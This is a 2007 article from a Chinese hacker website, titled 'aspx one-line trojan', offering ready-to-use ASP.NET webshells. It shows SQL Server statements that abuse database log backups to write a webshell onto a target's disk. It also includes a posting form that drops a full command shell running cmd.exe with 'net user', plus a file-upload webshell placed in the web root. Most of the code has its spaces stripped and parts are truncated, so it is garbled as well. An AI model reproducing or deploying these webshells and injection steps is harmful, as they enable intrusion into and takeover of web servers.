文章 | 入侵攻击 | 安全防御 | 操作系统 | 网站建设 | 网络编程 | 路由交换 | 灾难恢复 | 新闻资讯 | 安全公告
下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创发布 | 动画教程
论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 美女贴图 | 灌水无罪 | 在线服务 | 会员照片 | 网站首页
 当前位置:主页 >> 技术文摘 >> 网络编程 >> NET编程 >> 文章内容  
 

 
aspx的一句话木马

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------
 

1.相当于ASP的一句话木马:


程序代码

alterdatabasepubssetRECOVERYFULL--
createtablepubs.dbo.cmd(aimage)
backuplogpubstodisk='c:\TM'withinit
insertintopubs.dbo.cmd(a)values('<%@PageLanguage="C#"validateRequest="false"%><%System.IO.StreamWriterow=newSystem.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%>')
backuplogpubstodisk='d:\test11.aspx'
//这个和asp的一样,客户端post一个变量l把木马代码丢在变量l里面就ok了这个是类似asp的一句话木马
//mu.aspx.htm客户端:(提交后访问:http://IP/images.aspx)
<formaction=http://192.168.2.100/asp/mu.aspxmethod=post>
<b>在下面输入大马内容:</b><br>
<textareaname=lcols=120rows=35width=45>
<%@PageLanguage="VB"Debug="true"%>
<%@importNamespace="system.IO"%>
<%@importNamespace="System.Diagnostics"%>
<scriptrunat="server">
SubRunCmd(SrcAsObject,EAsEventArgs)
DimmyProcessAsNewProcess()     
DimmyProcessStartInfoAsNewProcessStartInfo(xpath.Text)     
myProcessStartInfo.UseShellExecute=False   
myProcessStartInfo.RedirectStandardOutput=true  
myProcess.StartInfo=myProcessStartInfo     
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
DimmyStreamReaderAsStreamReader=myProcess.StandardOutput
DimmyStringAsString=myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text=vbcrlf&"<pre>"&mystring&"</pre>"
EndSub
</script><html><head>
<title>ASP.NETShellforWebAdmin2.XFinal</title>
<metahttp-equiv="Content-Type"c/></head><body>
<formrunat="server">
<asp:Labelid="L_p"style="COLOR:#0000ff"runat="server"width="80px">;Program</asp:Label>
<asp:TextBoxid="xpath"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;BORDER-BOTTOM:#084b8e1pxsolid"runat="server"Width="300px">c:\windows\system32\cmd.exe</asp:TextBox><br/>
<asp:Labelid="L_a"style="COLOR:#0000ff"runat="server"width="80px">Arguments</asp:Label>
<asp:TextBoxid="xcmd"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;BORDER-BOTTOM:#084b8e1pxsolid"runat="server"Width="300px"Text="/cnetuser">/cnetuser</asp:TextBox><br/>
<asp:Buttonid="Button"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;COLOR:#ffffff;BORDER-BOTTOM:#084b8e1pxsolid;BACKGROUND-COLOR:#719bc5" runat="server"Width="100px"Text="Run"></asp:Button><p>
<asp:Labelid="result"style="COLOR:#0000ff"runat="server"></asp:Label></p></form></body></html>
</textarea><BR><center><br>
<inputtype=submitvalue=提交>
 

2、下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用:


程序代码
 
droptablepubs.dbo.cmd
alterdatabasepubssetRECOVERYFULL
createtablepubs.dbo.cmd(aimage)
backuplogpubstodisk='c:\TM'withinit
insertintopubs.dbo.cmd(a)values('<scriptlanguage="c#"runat="server">privatevoidbc(objecto,EventArgse){stringu="files";stringfilename;intpos=f.PostedFile.FileName.LastIndexOf("+1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><formmethod="post"runat="server"><inputtype="file"id="f"runat="server"/><inputtype="submit"value="ss"runat="Server" /></form>')
backuplogpubstodisk='c:\inetpub\wwwroot\test11.aspx'

 

   -------------------------------------------------------------------------------------------
  上一篇:Asp.net一夜速成教程
  下一篇:利用ASP.Net 动态生成HTML文件
   -------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
推荐:ASPX一句话木马--终
利用ASP.Net 动态生成HTML
asp.net实现验证码
在asp.net中利用session做
Asp.net 中在客户端触发服
Asp.net 中服务端控件事件
ASP.NET上传图片并生成可
ASP.NET AJAX解决网页打开
实现IE浏览器部分菜单命令
Asp.net一夜速成教程
从sqlserver中读取图片
ASP.NET页面间的传值的几
用动态属性和DataView实现
用PagedDataSource类实现D
关于TreeView控件专题
asp.net上传图片并同时生
ASP.NET中水晶报表的使用
ASP.NET 中 Cookie 的基本
ADO.NET使用经验集
Forms身份验证
ASP.NET四种页面导航方式
ASP.NET中如何防范SQL注入
[分享]ASP.NET学习手记```
ASP.NET编程中的十大技巧
用ASP.NET上传图片并生成
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2007 Www.Hx99.Net
版本:华西黑盟网站系统V5.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号